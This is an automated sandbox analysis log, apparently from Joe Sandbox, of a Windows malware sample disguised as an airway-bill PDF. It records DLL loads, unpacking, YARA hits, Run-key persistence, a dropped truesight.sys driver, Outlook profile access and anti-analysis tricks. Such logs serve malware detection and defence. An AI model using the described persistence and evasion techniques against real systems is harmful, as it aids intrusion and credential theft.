                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: msimg32.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: version.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: url.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ??????????.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ??.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ???e???????????.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: wininet.dll
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: mswsock.dll
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: rasadhlp.dll
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\proquota.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Static file information: File size 1364480 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WQzLddwiZR.exe, 00000011.00000000.2545685733.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000013.00000002.3368381118.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000015.00000000.2752944866.000000000081E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: hdcleziT.pif, 00000005.00000003.2447031738.0000000024928000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000003.2481886824.0000000024AD8000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024E1E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: hdcleziT.pif, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021742000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021771000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

Source: C:\Users\Public\Libraries\hdcleziT.pif | Unpacked PE file: 5.2.hdcleziT.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\hdcleziT.pif | Unpacked PE file: 11.2.hdcleziT.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\hdcleziT.pif | Unpacked PE file: 15.2.hdcleziT.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
Source: Yara match | File source: 0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.22c67a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Tizelcdh.PIF.22265a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.22c67a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Tizelcdh.PIF.22265a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.2b20000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2231702231.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2191756371.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2342771726.0000000002226000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: hdcleziT.pif.0.dr | Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary, | 0_2_02B38798
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B4C2FC push 02B4C367h; ret | 0_2_02B4C35F
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B232FC push eax; ret | 0_2_02B23338
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2635A push 02B263B7h; ret | 0_2_02B263AF
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2635C push 02B263B7h; ret | 0_2_02B263AF
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B4C0AC push 02B4C125h; ret | 0_2_02B4C11D
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B4C1F8 push 02B4C288h; ret | 0_2_02B4C280
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B4C144 push 02B4C1ECh; ret | 0_2_02B4C1E4
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B386B8 push 02B386FAh; ret | 0_2_02B386F2
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B26736 push 02B2677Ah; ret | 0_2_02B26772
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B26738 push 02B2677Ah; ret | 0_2_02B26772
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2C4EC push ecx; mov dword ptr [esp], edx | 0_2_02B2C4F1
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B3E5AC push ecx; mov dword ptr [esp], edx | 0_2_02B3E5B1
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2D520 push 02B2D54Ch; ret | 0_2_02B2D544
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2CA82 push 02B2CCF2h; ret | 0_2_02B2CCEA
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B4BB64 push 02B4BD8Ch; ret | 0_2_02B4BD84
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2CB6C push 02B2CCF2h; ret | 0_2_02B2CCEA
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B3788C push 02B37909h; ret | 0_2_02B37901
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B368C6 push 02B36973h; ret | 0_2_02B3696B
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B368C8 push 02B36973h; ret | 0_2_02B3696B
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B38910 push 02B38948h; ret | 0_2_02B38940
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B3A917 push 02B3A950h; ret | 0_2_02B3A948
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B3A918 push 02B3A950h; ret | 0_2_02B3A948
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B3890E push 02B38948h; ret | 0_2_02B38940
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B32EE0 push 02B32F56h; ret | 0_2_02B32F4E
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B32FEB push 02B33039h; ret | 0_2_02B33031
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B32FEC push 02B33039h; ret | 0_2_02B33031
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B35DFC push ecx; mov dword ptr [esp], edx | 0_2_02B35DFE
Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: 5_2_004148B6 pushad ; retn 9DA8h | 5_2_00414987
Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: 5_2_0040D99D push esp; iretd | 5_2_0040D99E
Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: 5_2_004182B8 push 0000005Bh; iretd | 5_2_004182BA
Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: 5_2_00416373 push ds; iretd | 5_2_00416372

                      Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | File created: C:\Users\Public\Libraries\hdcleziT.pif
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | File created: C:\Users\Public\Libraries\Tizelcdh.PIF
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | File created: C:\Windows \SysWOW64\truesight.sys
Source: C:\Users\Public\Libraries\Tizelcdh.PIF | File created: C:\Windows \SysWOW64\truesight.sys
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | File created: \airway bill details - delivery receipt contact form no_45987165927 ,pdf.scr.exe
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tizelcdh
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B3A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_02B3A954
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\proquota.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24CF096E rdtsc 5_2_24CF096E
                      Source: C:\Windows\SysWOW64\proquota.exe; Window / User API: threadDelayed 9839
